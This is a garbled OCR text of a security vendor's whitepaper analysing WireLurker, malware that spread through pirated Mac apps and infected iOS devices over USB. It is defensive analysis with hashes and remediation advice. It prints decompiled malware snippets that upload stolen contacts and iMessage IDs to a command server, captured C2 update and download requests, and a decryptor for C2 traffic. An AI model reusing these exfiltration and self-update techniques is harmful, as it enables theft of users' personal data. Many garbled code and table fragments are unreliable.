WIRELURKER: - Palo Alto Networks
Contents
1. We wrote the following Python script to decrypt WireLurker version C communication data usr bin env python import base64 import pyDes import sys original data sys argv 1 session key d sum int c for c in original data 10 key session key dksyel encrypted data original data 1 des cryptor pyDes des key pyDes ECB padmode pyDes PAD PKCS5 plaintext des cryptor decrypt base64 b64decode encrypted data print plaintext PALO ALTO NETWORKS WireLurker Apple OS X and 10S malware 1 4 Using the C2 communication captured in Figure 13 the following data was sent from the WireLurker C2 server to an infected OS X system over T CP 14109439427UQZMzfWZHOIJCcSFVSE5xCOZVsy2fbV4 yehvSgxDHE COrxagqyvabtv9K 7uL8 T FmgjvLicVVYiyHKweloJT 7ts9bnl7ap934 VincBedikuN TgWizXCFL 72LXROAEfIPn1Hywb6Xur Tv6KKvToZG2w 2 Decryption by our script yields the following 2257b9e685e89b8c7e11f554b05cdd6819a http cos myqcloud com 1001584 ipa 7b9e685e689b8c7e11f554b05cda68 19a WireLurker version C uses a numeric CODE value to identify different kinds of data transmitted from client to server in C2 communications We list all of these codes mapped to their data associations in the Appendix i0S Application Download WireLurker version A does not download iOS applications however it reserves a folder in usr local machook ipa for this functionality Versions B and C download IPA files to usr lo2. PALO ALTO NETWORKS Checking for update OS X Exfiltration of system information Heartbeat Check for app to download Checking for update iOS Exfiltration of user data Check for app to download Check for app to download Check in for malware Log application installation Log application start Report update error Report update error WireLurker Apple OS X and IOS malware 31 Version C Encrypted C2 Communication Codes The following is a list of WireLurker version C customized encryption C2 communication codes mapped to data context 100 101 102 103 104 105 106 107 108 200 201 202 300 400 401 999 Data Context Hardware information for the connected iOS device Enumeration of apps installed on the 10S device Start of operations on an iOS device No USB device found An application was successfully installed on the iOS device Whether an iOS device was paired with the OS X computer Heartbeat packet Hardware information of connected USB device An 105 device was disconnected Check for code update Start send operation for the local log file End send operation for the local log file Check for iOS application to download Code was run with root privileges OS X user appears to be a developer Current OS X system version GD U I j t Z Santa Clara CA 95054 Main 1 408 753 4000 Sales 1 866 320 4788 Support 1 866 898 9087 www paloaltonetworks com 4401 Great America Park
3. WIRE A New Era in IOS and OS X Malware REPORT BY unit CLAUD XIAO PALO ALTO NETWORKS 4401 Great America Parkway Santa Clara CA 95054 jis c loa Ito www paloaltonetworks com d NETWORKS TABLE OF CONTENTS Executive Summary 3 Background 4 User Reporting for this Threat 4 Investigation of the Third Party App Store 5 WireLurker Workflow and Malware Progression 6 WireLurker Versions 7 Analysis of WireLurker OS X Malware 9 Bundle Repackaging and File Hiding 9 Self Update 11 Persistence Mechanisms 13 C2 Server Communication 14 IOS Application Download 15 USB Connection Monitoring 17 Exfiltration of Device Information 17 Installation of Malicious Dynamic Library to an IOS Device 18 Backup of Specific Installed Applications from an 10S Device 19 Trojanizing iOS Applications 20 Installation of Trojanized IOS Applications 20 Analysis of WireLurker 10S Malware 22 Code Injection into System Applications 22 Self Update 23 Exfiltration of User Data 24 Exfiltration of Application Usage and Device Serial Number Information 25 Overall Threat Analysis 26 Use of Repackaging to Trojanize Applications 26 Malicious Use of USB Connections 26 Attacks Against Jailbroken Devices 26 Attacks Against Non Jailbroken Devices 26 Actor Motivation 27 Prevention Detection Containment and Remediation 27 Prevention 27 Detection and Containment 28 Remediation 29 Acknowledgements 29 Appendix 30 SHA 1 Hashes of WireLurker Related Files 30 URLs for
4. FIGURE 1 Report of strange apps appearing on a non jailbroken iPhone Nine days later a thread was created on a Chinese developer forum by the user LeoHe describing anomalous findings on his iPhone A similar thread was created on a Chinese Apple fan forum on August 9 2014 In these forum threads numerous users reported the installation of strange applications and the creation of enterprise provisioning profiles on their non jailbroken iPhones and iPads Figure 2 fkue0487 zE LPPE Te S URS ie HLR o F T 1 lovewilliam J LU CAR RH MBIT Ro o lovewilliam yj SEEIJERCATIS Siffipad4 XX BOSE ET EREMI Napp MER FIGURE2 Additional developer forum discussion regarding anomalous findings They also mentioned launch daemons found on their Mac computers with names like machook damon and WatchProc Some of these same users stated that they recently downloaded and installed applications from the Maiyadi App Store http app maiyadi com a third party OS X and IOS application store in China As background the Maiyadi site is a Chinese portal for Apple related news and resources The Maiyadi App Store is a sub site known to host pirated premium Mac iPhone and iPad applications PALO ALTO NETWORKS WireLurker Apple OS X and iOS malware 4 Investigation of the Third Party App Store Some forum users specifically mentioned downloading a Mac application named CleanApp Figure 3 from the Maiyadi App Store
5. wild WireLurker is the second malware family known to employ this strategy The notable difference between WireLurker and Mekie is that the WireLurker also targets non jailbroken iOS devices Attacks Against Jailbroken Devices From a trending perspective it is clear that attacks against jailbroken IOS devices will continue to increase During 2014 six new iOS malware families targeting jailbroken devices were found three of which by Palo Alto Networks AdThief infected and replaced the Advertisement ID of 75 000 devices e Unflod hijacked all iTunes traffic to steal Apple IDs e Mekie acted as a spyware and stole users Email SMS and other IM s log AppBuyer stole Apple IDs and bought apps in the background through emulated iTunes protocols e Xsser is a RAT spreading broadly in Hong Kong e WireLurker the subject of this whitepaper There are common characteristics across these malware families except for the Mekie including e They all targeted jailoroken devices e They all used the Cydia Substrate framework or were hosted in some third party Cydia repositories They all originated from China and mainly targeted Chinese users Attacks Against Non Jailbroken Devices Historically only two malware adware families have been confirmed as successfully installed onto non jailoroken iOS devices the LBTM adware in September 2010 and the FindAndCall worm in July 2012 Since Apple removed them from the official App Store immed
6. an OS X system Figure 11 zi 0759e685e89b8c7e111554b050dd6819a gnare Qgiokenizer Be Sy 4310221000 musr 11 pl a aL PluginHelper Capin Msystemkeychain helper periodicdate fiicom apple MailServiceAgentHelper Ocom apple periodic dd mm yy plist Ocom apple systemkeychain helper plist Ocom apple MailServiceAgentHelper plist Ocom apple appstore plughelper plist Otibzip 2 dylib Oribz 1 dylib Olibxmil2 2 dylib Olibusbmuxd 2 dylib CU Oribssi 1 0 0 dylib Setc Omanpath d Olibplist 2 dylib Oliblzma 5 dylib Otibiodb dylib Otibimobiledevice 4 dylib Aipiconv 2 dytid Otiberypto 1 0 0 dylib 74152d100084691053670a707 1250853 dea26a823839b1b3a810d5e731d76aa2 1264b9607a68de8b9bbbe3043615128 003402006332a6017c360569178402097 3uSystem Library 9LaunchDaemons 13b41164b016876c13bbb4a221450 bda47014568dae8cb12344a346a181d9 1215103ed1221065e64508d41de3 private tmp iImptmpdbmrtit journal Imptmpdbmriit ache db shm agroot Library D lCaches Bcom apple appstore PluginHelper 1 Golders zz 3zyxvpxvq6cstxvn n00000b400002s 09C db 3faunchd db Scom apple launchd overrides plist FIGURE 11 Files dropped by the obfuscated update binary 12 Table 3 maps each of these malicious files to their corresponding drop path Of significant note dea26a823839b1b3a810d5e731d 6aa2 usr bin sttyb 11 pl is a Mach O universal binary executable file for ARMv7 and ARMv s architectures The dff52d100c8d69f1053670a707125b
7. an application named FA 88h User Manual in English FIGURE 4 Installation interface of WireLurker infected applications These trojanized applications were hosted on two cloud storage websites Huawei and Baidu instead of on Maiyadi s servers WireLurker Workflow and Malware Progression This section summarizes WireLurker s workflow and malware progression Figure 5 which are described in further detail in subsequent sections Trojanize Mac Application Upload to 3 Party App Store User Downloads amp Runs Mac App Check for Updates Communicate Mac App Drops amp with C2 Server Installs Files Download iOS Monitor USB for Download New Apps iOS Connections Code Backup Specific iOS Device Exfiltrate Device iOS Apps Infection Information Trojanize iOS Exfiltrate User Apps Data FIGURE5 WireLurker s workflow and malware progression PALO ALTO NETWORKS WireLurker Apple OS X and iOS malware 6 WireLurker was used to trojanize pirated Mac applications that were uploaded to the Maiyadi App Store Victims downloaded these applications installed them on their OS X systems and ran them On instantiation WireLurker s entry code was transparently executed dropping malicious executable files dynamic libraries and configuration files prior to running the original pirated application some of these executable files were loaded by the operating system as launch daemons One launch daemon manages connec
8. msgSend amp OBJC CLASS X NSString stringWithFormat CFSTR mv X Xg x v48 s objc me peor venit rhe er m B v41 void objc retainAutorelease v40 v42 v41j v43 const char objc msgSend v41 UTF8String system v43 FIGURE 30 Restoring the original bundle executable file The exfiltration of this information is most likely used by the attacker for tracking WireLurker infections PALO ALTO NETWORKS WireLurker Apple OS X and IOS malware 25 Overall Threat Analysis Use of Repackaging to Trojanize Applications WireLurker trojanized OS X and iOS applications using repackaging through executable file replacement This technique is both simple to implement and effective We expect to see more OS X and iOS malware employing it in the future similar to the respective increase in malicious APK repackaging by Android malware authors Malicious Use of USB Connections Proof of concepts for attacking non jailoroken iOS devices over USB connections have been available for some time now In May of 2013 Mathieu Renard described how to use a malicious USB accessory to install applications to iOS devices during a presentation at Hackito Ergo Sum At Black Hat 2013 Billy Lau and others demonstrated a very similar attack using malicious device chargers However it wasn t until June 24 2014 that Kaspersky Lab found an iOS version of the Mekie spyware using this technique on Windows and OS X computers in the
9. strange applications found on the device For jailbroken devices we recommend that you check whether the file Library MobileSubstrate DynamicLibraries sfbase dylib exists If so you should delete it through a terminal connection via an application like Mobile Terminal or secure Shell SSH Acknowledgements We would like to thank CDSO from the WeiPhone Technical Group for forwarding user reports to us QU Chao from Tencent Inc for providing samples of WireLurker version B and Hui Gao Xin Ouyang Zhi Xu and Jin Chen of Palo Alto Networks for making sure our customers are well protected by our products We would also like to thank Rob Downs and Ryan Olson of Palo Alto Networks for their great effort on improving this report s accuracy fluency and quality Their works help all of us to understand the threat more clearly PALO ALTO NETWORKS WireLurker Apple OS X and 10S malware 29 Appendix SHA 1 Hashes of WireLurker Related Files The following are the SHA 1 values of malicious files across the WireLurker lifecycle Original Files Used to Trojanize Filename lt variable name gt e2b9578780ae318dbdb949aac32a 7dde 6c d918 lt variable name gt bb8cbc2ab928d66fa1f17e02f112634ad38a477d6 start sh 42ad4311f5e7e520a40186809aad981f78c0cf05 FontMap1 cfg 1130ef7a16482805ab37785ae1e66408bd482120 Downloaded Updates Filename update zip eab02ab858e84c9b61caff92d88ff007ffe930e start sh ddb152c140ebff b755b2822875c688ce
10. the attacker to collect significant amounts of information from a large number of Chinese iOS and Mac OS systems but none of the information points to a specific motive As infected devices regularly request updates from the attackers command and control server new features or applications could be installed at any time It s clear the tool set is still undergoing active development and we believe WireLurker has not yet revealed its full functionality Prevention Detection Containment and Remediation Prevention The following are our recommendations to enterprises and users regarding prevention or mitigation of WireLurker or similar OS X or iOS malware threats e Enterprises should assure their mobile device traffic is routed through a threat prevention system using a mobile security application like GlobalProtect e Employ an antivirus or security protection product for the Mac OS X system and keep its signatures up to date e n the OS X System Preferences panel under Security amp Privacy ensure Allow apps downloaded from Mac App Store or Mac App Store and identified developers is set e Do not download and run Mac applications or games from any third party app store download site or other untrusted source e Keep the iOS version on your device up to date e Do not accept any unknown enterprise provisioning profile unless an authorized trusted party e g your IT corporate help desk explicitly instructs you to do so PAL
11. 0 ri4 s rcx BackupApp var 60 com alipay iphoneclient else 1 r14 rcx if LOBYTE var B0 0x0 BackupApp var 60 com meitu mtxx 1 FIGURE 21 Applications that WireLurker looks for on an iOS device PALO ALTO NETWORKS WireLurker Apple OS X and IOS malware 1 9 WireLurker s code also revealed an unfinished stub looking for the com tencent mqq application which is the client app of the popular IM service QO produced by Tencent We anticipate the inclusion of checks for this application in future versions of WireLurker Trojanizing iOS Applications WireLurker passes the device s jailbroken status to a function named InstallApp which installs downloaded IPAs or re installs trojanized versions of the specific applications mentioned previously loc 10000531d strcat var 90 var 70 r12 zip name locate if LODWORD r12 0x0 goto loc 10000542 var 8 0x0 asprintf var 78 s var 90 zip rename r12 fopen usr bin stty5 11 pl rb r13 zip source filep if r13 0x0 goto loc 100005646 goto loc 1000053ca loc 100005646 rax Utils LogFile cfstring z goto loc 100004178 loc 1000053ca rax zip file add if LODWORD rax lt 0x0 zip source free fclose r12 Utils LogFile zip added zip_close fclose r12 FIGURE 22 WireLurker infection of iOS applications If the device is jailbroken InstallApp will trojanize an iOS app
12. 0853 file is a ZIP archive that is decompressed to etc manpath d The resulting etc manpath d libiodb dylib is also an ARMv7 and ARMv7s executable file These two ARM executable files are used for subsequent repackaging of iOS applications that are then installed on iOS devices FILENAME DROP PATH 94a933c449948514a3ce634663f9ccf8 System Library LaunchDaemons com apple appstore plughelper plist e6e6a7845b4e00806da7d5e264eed72b System Library LaunchDaemons com apple MailServiceAgentHelper plist fd7b1215f03ed1221065ee4508d41de3 System Library LaunchDaemons com apple systemkeychain helper plist bda470f4568dae8cb12344a346a181d9 System Library LaunchDaemons com apple periodic dd mm yy plis dca13b4ff64bcd6876c13bbb4a22f450 usr bin com apple MailServiceAgentHelper aa fe189baa35ba be aafac1e765f41 usr bin periodicdate e03402006332a6e17c36e5691784d2097 usr bin systemkeychain helper c4264b9607a68de8b9bbbe3043615f28 usr bin com apple appstore PluginHelper dea26a823839b1b3a810d5e731d76aa2 usr bin stty5 11 pl dff52d100c8d69f053670a70712b0853 Unzipped to etc manpath d TABLE 3 Drop paths for appended ZIP archive files from update binary Persistence Mechanisms WireLurker remains running as a background process waiting for iOS devices to infect over USB connections Multiple methods and redundancy are used to achieve this goal e Every time a user runs a WireLurker trojanized application the loader executes malicious code in th
13. 3619e75 update 03c8dd6ea2a940da347e25f4de8724b4e8c48842 Dropped Files version A Filename machook 7adb66f1043a7378d418d51a415818373a5d3b67 watch sh bacc91lae4856f4f52c82f1dd1be41c85ef5f1f0 globalupdate 0396176f3a9bfc8c2b8ddc979d723f19a77116388 com apple globalupdate plist 1e9bc3259a514bcce39bac895f46c04cb122677b com apple machook damon plist 9065133025d834a3e2f5ca3b2142a47526d7418f sfbase dylib 461b51dd595c07f3c82be7cffc1cc77da6700605 Dropped Files version B Filename machook 4cO4ccd 6bf al edb7b94f9320f80289d 1097829 itunesupdate f573add40eea190931 2a438fc51cd45569cb94ab globalupdate 0396176f3a9bfc8c2b8ddc979d723f9a77F1 6388 WatchProc 8f57cef045ed370d210d3fce2c0d261bd83c5167 com apple machook_damon plist 9065133025d834a3e2f5ca3b2142a47526d7418f com apple itunesupdate plist 32cf3ead21079ed98ae50c7875d1e91e76ebb5cf com apple globalupdate plist 1e9bc3259a514bcce39bac895f46c04cb122677b com apple watchproc plist 1bc0b3961454b80b8b39198b605403366bfb0621 start 0134bb87585a448caafe51218746e070f3b 17272 PALO ALTO NETWORKS gt WireLurker Apple OS X and iOS malware 30 Dropped Files version C Filename periodicdate systemkeychain helper com apple MailServiceAgentHelper com apple appstore PluginHelper com apple periodic dd mm yy plist com apple systemkeychain helper plist com apple MailServiceAgentHelper plist com apple appstore plughelper plist stty5 11 pl libiodb dylib com apple Finde Malicious 10S Exec
14. C2 Communication 31 Version C Encrypted C2 Communication Code 32 Executive Summary Palo Alto Networks recently discovered a new family of Apple OS X and iOS malware which we have named WireLurker We believe that this malware family heralds a new era in malware across Apple s desktop and mobile platforms based on the following characteristics e Of known malware families distributed through trojanized repackaged OS X applications the biggest in scale we have ever seen e Only the second known malware family that attacks iOS devices through OS X via USB e First malware to automate generation of malicious iOS applications through binary file replacement e First known malware that can infect installed IOS applications similar to a traditional virus e First in the wild malware to install third party applications on non jailoroken iOS devices through enterprise provisioning WireLurker was used to trojanize 467 OS X applications on the Maiyadi App Store a third party Mac application store in China In the past six months these 467 infected applications were downloaded over 356 104 times and may have impacted hundreds of thousands of users WireLurker monitors any iOS device connected via USB with an infected OS X computer and installs downloaded third party applications or automatically generated malicious applications onto the device regardless of whether it is jailbroken This is the reason we call it wire lurker Researchers hav
15. C2 server Educated guesses based on URL structure revealed two earlier versions of sfbase dylib still hosted on the C2 server 4 0 0 and 4 0 1 Based on these version numbers we speculate that there may be as many as three other major version releases of sfbase dylib used in prior attacks Version File Size bytes SHA 1 Value 4 0 0 290 492 f097eb7af4ea7783713adf01e5483b0d89375be8 4 0 1 296 208 2a40a5e0b350264195f858e291678c290e4a18c4 4 0 2 296 288 461b51dd595c07f3c82be7cffc1cc7 da6700605 TABLE 5 Different versions of sfbase dylib PALO ALTO NETWORKS WireLurker Apple OS X and i0S malware 23 Exfiltration of User Data In addition to hooking system APIs the sfbase dylib dynamic library also steals user data and uploads it to the C2 server Specifically it copies the file User Library AddressBook AddressBook sqalitedb into the tmp directory using root privileges Figure 27 then executes the following SQLite query select m value sphone p first p last from ABMultiValue m ABPerson p where m record id p rowld v18 s objc msgSend JC CLASS NSString cetrisquitirorsuts e CFSTR cp rf X8 xa Jo CFSTR User Library AddressBook AddressBook sqlitedb CFSTR tmp AddressBook sqlitedb v63 1 v48 objc_ retainAutoreleasedReturnValue v19 v63 z 2 setuid 8 v63 3 setgid 8 v11 s objc retainAutorelease v48 v38 v11 v63 4 v12 const char objc msgSend void vi1 U
16. ECUTABLE NAME CFSTR Preferences 3 if v3 lt Lad non i lt un Wu M if unsigned int objc msgSend v5 containsObject v3 amp OxFF objc_msgSend amp 0BIC_CLASS___mydUtils CheckUpdate v6 objc_msgSend amp 0BIJIC_CLASS___UIWindow class MSHookMessageEx v6 sendEvent replace_UIWindow_sendEvent amp original UIMWi v7 a ee alloc v8 objc msgSend v7 EI initWithObjects CFSTR Search CFSTR MobileStorageMounter LE Lider NAME CFSTR Preferences e if unsigned int objc msgSend v8 containsObject v3 amp xFF objc msgSend amp OBJC CLASS X mydUtils getLoaclInfo FIGURE 24 Initialization code of sfbase dylib iOS dynamic library This dynamic library adds a notification observer within its sendEvent hook for a user pressing the home button On detection of this event it kills all Phone Messages and Safari processes in the background using root privileges This piece of hooking code is most likely still under development since at the time of this whitepaper s publication we found unfinished methods like mydUIWebViewHook hook webView didFinishLoadForFrame and mydWebView webView shouldStartLoadWithRequest navigationType which attempt to hook the WebView library for loading URLs in the background without the user s knowledge Figure 25 PALO ALTO NETWORKS WireLurker Apple OS X and iOS malware 22 E grar cdecl mydW
17. IGURE 17 WireLurker callback function registration to monitor USB connections Every time an iOS device connects or disconnects from a WireLurker infected computer the above callback is invoked For connections the function fetches the iOS device s Unique Device Identification Number UDID and then calls OperatDevice char const which allows a number of iOS device operations including e Collection and transmission of device information to the C2 server e Installation of malicious dynamic libraries Substrate tweak to a Jailbroken device e Backup of specific installed applications from a device e Repackage of downloaded or backed up applications to include a malicious ARM executable file e Installation of repackaged applications to a jailbroken device or downloaded applications to a non ailbroken device Exfiltration of Device Information WireLurker uses the libimobiledevice library interfaces to access the lockdown service on IOS device over USB and collect the following device information Figure 18 e Serial number e Phone number e Model number e Device type and version name e User s Apple ID e UDID e Wi Fi address e Disk usage information PALO ALTO NETWORKS WireLurker Apple OS X and IOS malware 17 mov r12 rax mov rdi cs client lea rdx aPhonenumber PhoneNumber xor esi es call Z13getdeviceinfoP24lockdownd client privatePKcS2 mov r13 rax mov rdi cs client lea rdx aModelnu
18. KS WireLurker Apple OS X and IOS malware 11 Most update operations are accomplished through the update binary This file is a Mach O executable file header however a ZIP archive is appended to it Figure 10 The ZIP archive includes another 10 files with their MD5 hash values used for corresponding filenames eoo cxiao PANM 18JVFHOORAP Downloads WireLurker samples update zsh x file update update Mach 0 64 bit executable x86 64 dd if update of update tail bs 1 skip x17744 319735240 records in 319735240 records out 3197352 bytes transferred in file update tail update tail Zip archive data at least v2 0 unzip l update tail Archive update tail Length Date Time Name 474 37 29 14 10 51 4438330c449948514a3ce634 478 07 29 14 10 51 e6e6a7845b4 e008 466 07 2 4 10 51 td b1215f 3ed1221 453 07 29 14 10 51 bdo470f4568daeB8cb12344 603332 02 i 02 23 dcal3b ff64bcd6876c13bbb4i 4 688100 5 22 03 23 aa6fel89baa35Sab6Sebaafacle765f41 641704 06 12 03 23 e03407000337206e1 7c36e5691 78d209 7 637640 01 27 13 03 23 c4264b9607a68de8b9bbbe 304 36f 5f 28 139744 07 2 4 15 dea26a823839b1b3a810d 2436908 0 2 12 56 dff52d100c8d69f053670a70712b08 5149299 FIGURE 10 Exploring WireLurker version C update binary The 64 bit code of the update binary is highly obfuscated Dynamic analysis reveals that it extracts the appended ZIP package decompresses it and moves the ten enclosed files to specified paths on
19. LibraryMobiles Library MobileSubstrate DynamicLibrarie call Z16afc upload filesP18afc client privatePKcS2 afc upload files test eax eax FIGURE 20 Installation of malicious MobileSubstrate tweak to a jailbroken iOS device Backup of Specific Installed Applications from an iOS Device The libimobiledevice library also provides interfaces to two standard Apple services available on every iOS device AFC and com apple mobile installation proxy Using these interfaces WireLurker attempts to determine whether certain applications are already installed on the device If they are it performs a backup of their IPA bundle files through the two Apple services equivalent to a normal application backup using iTunes Backed up IPA bundle files are subsequently stored in the usr local machook ipa folder and log related information is written to a local SQLite database The list of hardcoded iOS applications that WireLurker looks for follows Figure 21 e com meitu mtxx A photo modification app produced by Meitu e com taobao taobao4iphone The official client app of Taobao like Ebay in China produced by Alibaba e com alipay iphoneclient The official client app of Alipay like PayPal in China produced by Alibaba if int8_t x is High OS 0x0 amp amp LOBYTE var 6C x 1 rcx r14 if LOBYTE var B8 0x8 1 r1l4 rcx BackupApp var 60 com taobao taobao4iphone else if LOBYTE var C0 0x
20. O ALTO NETWORKS WireLurker Apple OS X and IOS malware 27 e Do not pair your iOS device with untrusted or unknown computers or devices e Avoid powering your iOS device through chargers from untrusted or unknown Sources e Similarly avoid connecting IOS devices with untrusted or unknown accessories or computers Mac or PC e Do not jailbreak your iOS device If you do jailbreak it only use credible Cydia community sources and avoid the use or storage of sensitive personal information on that device Detection and Containment From May 21 2014 through September 28 2014 five different WireLurker files representing three different versions were submitted to VirusTotal however none of the 55 threat detection engines employed by Virus Total identified this threat Figure 31 Our hope is that this report will contribute to improved detection rates pa total SHA256 93856f704db2efe2e2262e6c7 10a23d03d6b0748c02e4d5dBd2d4e25f56aBb32 File name machook Detection ratio 0 55 Analysis date 2014 09 28 14 20 16 UTC 2 weeks 5 days ago Analysis 6 Additional information S Comments y Votes Antivirus Result Update AVG 20140928 AVware o 20140927 FIGURE 31 VirusTotal threat detection engines did not flag WireLurker as malware In terms of network based detection Palo Alto Networks released two signatures 13748 13749 to detect all WireLurker C2 communication traffic When our customers receive an alert fo
21. TF8String v13 obje msgSend amp OBJC CLASS FMDatabase databaseWithPath CFSTR tmp AddressBook sqlitedb v63 v49 void objc retainAutoreleasedReturnValue v13 v63 7 if unsigned int objc msgSend v49 open amp OexFF objc retain dU select m value sphone p first p last from ABMultiValue m ABPerson p where m record idsp rowId v14 FIGURE 27 Code showing sfbase dylib capturing iOS contacts information It also copies the file User Library SMS sms db into the tmp directory using root privileges and executes the following SQLite query to capture iMessage chats select distinct chat identifier from chat where service name Message This query returns all of the iMessage IDs the user has communicated with from the database After executed the above SQLite queries sfbase dylib deletes those temporary database copies saves results to a local file and extiltrates that file and Apple ID information to the C2 server wwwl comeinbaby com Figure 28 yen _msgSend v8 initWithHostName customHeaderFields CFSTR www comeinbaby com v22 z i v16 CFSTR POST vie objc msgSend v9 operationWithPath params httpMethod CFSTR app saveinfo php 0 CFSTR POST v22 1 v20 objc _retainAutoreleasedReturnValue vie v22 4 objc _msgsend void v20 addFile forKey v18 CFSTR text v16 v17 addHeader withValue v22 5 M _msgsend void v20
22. addHeader withValue CFSTR Connection CFSTR Keep Alive v16 obje nsgsend void v20 v17 CFSTR Charset CFSTR UTF 8 v16 ah p v20 v17 CFSTR Content Type CFSTR multipart form data boundarys v16 FIGURE 28 Exfiltration of iOS user data to C2 server PALO ALTO NETWORKS WireLurker Apple OS X and IOS malware 2 4 Exfiltration of Application Usage and Device Serial Number Information WireLurker repackages iOS applications with an ARM executable file named start or sttyb 11 pl depending on version This binary is a loader that collects the current applications name and device s serial number exfiltrates this information to the C2 server Figure 29 restarts the SpringBoard and restores the original bundle executable file Figure 30 v28 getValue CFSTR serial number v29 s void objc retainAutoreleasedReturnValue v28 v38 v29 v31 objc msgSend v29 objectAtIndexedSubscript 0 v32 s objc retainAutoreleasedReturnValue v31 v33 v32 v34 objc_msgSend amp OBJC CLASS _NSString stringWithFormat CFSTR http start log app 8 amp sn BundleExecutable v32 v35 s objc retainAutoreleasedReturnValue v34 v36 v35 v37 objc_msgSend amp 0BJC_CLASS NSURL URLWithString v35 v38 objc retainAutoreleasedReturnValue v37 sendRequestTo FIGURE 29 Exfiltration of application and serial number information system kill HUP nU yi KE v39 objc
23. ader and the original bundle executable After dropping the above script the loader determines whether this is the first time it has been run by looking for the usr local machook machook file If that file doesn t exist it performs the following actions e Copies the Resources start sh and Resources FontMap1 ctg files to the Users Shared folder on the Mac e Requests system administrator privileges Executes Users Shared start sh with administrator privileges The start sh script e Decompresses the FontMap1 ctg ZIP archive to a new folder usr local machook e Copies decompressed com apple machook damon plist and com apple globalupdate plist files to the Library LaunchDaemons folder to register them as system launch daemons e Launches these two daemons using the launchctl command e Copies a decompressed globalupdate file to the usr bin folder Then the loader collects the hardware serial number for the Mac and uploads it to the C2 server wwwl comeinbaby com Figure 8 gt Frame 23 253 bytes on wire 2024 bits 253 bytes captured 2024 bits on interface 6 Ethernet II Src Parallel 5c ab 55 60 1c 42 5c ab 55 Dst Parallel 00 00 18 00 1c 42 00 00 18 b Transmission Control Protocol Src Port 50645 50645 Dst Port http 80 Seq 1 Ack 1 Len 199 v b User Agent curl 7 24 0 x86_64 apple darwin12 0 libcurl 7 24 0 OpenSSL 0 9 8y zlib 1 2 5 r n Host www
24. and suspected it might be a culprit CleanApp Mac mA 4 0 8 wl TR 9 ii FF 025 Kw 34 96MB FRAT AR 3099 NFR Et fa 2014 05 30 Wa X np EAER OS X 10 7 5 MY Mac OS x WAT BER dm FIGURE 3 One of applications in the Maiyadi App Store infected with WireLurker In fact our Investigation revealed that almost all of the Mac applications totaling 467 uploaded to the Maiyadi App Store from April 30 2014 to June 11 2014 were trojanized repackaged with WireLurker These impacted applications were downloaded 356 104 times as of October 16 2014 Table 1 lists the top 10 WireLurker applications ordered by number of downloads WIRELURKER INFECTED APPLICATION NUMBER OF DOWNLOADS The Sims 3 42 110 International Snooker 2012 22 9S Pro Evolution Soccer 2014 20 800 Bejeweled 3 19016 Angry Birds 14 009 Spider 3 1278 NBA 2K13 113 GRID 107820 Battlefield Bad Company 2 9 065 Two Worlds Il Game of the Year Edition 6 451 TABLE 1 Top 10 WireLurker downloads from the Maiyadi App Store as of Oct 10 2014 PALO ALTO NETWORKS WireLurker Apple OS X and iOS malware 5 All of the WireLurker trojanized applications included an installation interface that used Pirates of the Caribbean themed wallpaper Figure 4 A ZEE seal and QQ account number were also displayed both of which correspond to the owner of the Maiyadi site Another similarity between these installers was that their packages always contained
25. app store client Malicious 10S executables New feature Path changed and content slightly changed Malicious 10S dynlibs No changes Path and filename changes TABLE 2 shows how these categories of files changed between versions The filenames and SHA 1 hashes for all associated files can be found in the Appendix of this whitepaper PALO ALTO NETWORKS WireLurker Apple OS X and iOS malware 8 Analysis of WireLurker OS X Malware Bundle Repackaging and File Hiding Every OS X application is comprised of a bundle that contains an executable as its main entry WireLurker trojanizes OS X applications using three files a loader shell script and ZIP archive The first step WireLurker takes is to append an underscore to the original bundle executable name and then copy its malicious loader into the bundle to replace the original executable As an example given an OS X bundle with an executable name of Contents MacOS CleanApp WireLurker would move the original file to Contents MacOS CleanApp and then copy the malicious loader to Contents MacOS CleanApp After executable replacement WireLurker then adds a shell script start sh and a ZIP archive FontMap1 cfg to the Contents Resources folder of the bundle The hidden flag is then set for these four files This flag is an Apple specified file property defined at usr include sys stat h as UF HIDDEN With this flag set a standard user won t see the files in the Fin
26. cal ipcc and usr share tokenizer Ja respectively and store download history in local SQOLite3 databases Analysis revealed that WireLurker version B downloaded two applications Iszr2 and pphelper The Iszr2 application is an IOS game developed by a Chinese company and the pphelper application is a third party iOS App Store s client WireLurker version C downloaded one application 7b9e685e89b8c7e111554b05cdd6819a a comic reader Filenames display names executable names and bundle identifiers for these applications are summarized in Table 4 File Name Display Name Executable Name Bundle Identifier lszr2 amp L tz y 2 lszr2 yueyu com737lszr2 yueyu pphelper PPHIISF 1E hk PPApplnstall qudaobao com gzteiron pphelper share 7b9e685e Ble manhua com manhuaba manhuajb 89b8c7e1 1f554b05c dd6819a TABLE 4 iOS applications downloaded by WireLurker Of note all IPA format iOS applications downloaded by WireLurker contain an embedded mobileprovision file in their bundle The ProvisionsAllDevices key value within these provisioning files is set to true Figure 14 which means these files are categorized as enterprise provisioning and that the applications are signed by enterprise certificates Name com manhuaba manhuajb ProvisionsAL lLDevices Teamldentifier 597S8 7B88E TeamName Hunan Langxiong Advertising Decoration Engineering Co Ltd FIGURE 14 WireLurker downloaded applications leverage enterprise p
27. comeinbaby com rin Accept x xXrn r n gt We HI http Jw CoOMeinbaby comma D appid ctitu RHBWDKT ewesecli B AL LeanApp HTTP request 1 1 FIGURE 8 WireLurker uploading the hardware serial number for an OS X victim machine PALO ALTO NETWORKS WireLurker Apple OS X and IOS malware 10 Self Update In WireLurker version A the dropped globalupdate file will be executed as a launch daemon and periodically check its C2 server for a new version using the following GET request http wwwl comeinbaby com mac getversion php sn HardwareSerialNumber A packet capture of this communication is shown in Figure 9 GET mac getversion php sn C02JRH8WDKQ1 HTTP 1 1 Host www comeinbaby com User Agent globalupdate unknown version CFNetwork 596 5 Darwin 12 5 0 x86 64 MacBookPro10 2C1l Accept Language en ja fr de es it pt pt PT nl sv nb da fi ru pl zh Hans zh Hant ko ar cs hu tr th ca hr el he ro sk uk en us Connection keep alive HTTP 1 1 200 OK Server Tengine 2 0 0 Date Thu 18 Sep 2014 09 05 22 GMT Content Type text json Transfer Encoding chunked Connection keep alive X Powered By PHP 5 5 9 Af i result version 1 url http X X www comeinbaby comX macX update zip 8 GET mac update zip HTTP 1 1 Host www comeinbaby com User Agent globalupdate unknown version CFNetwork 596 5 Darwin 12 5 0 xB6 64 MacBookPro1 2C1 Accept Language en ja fr de es
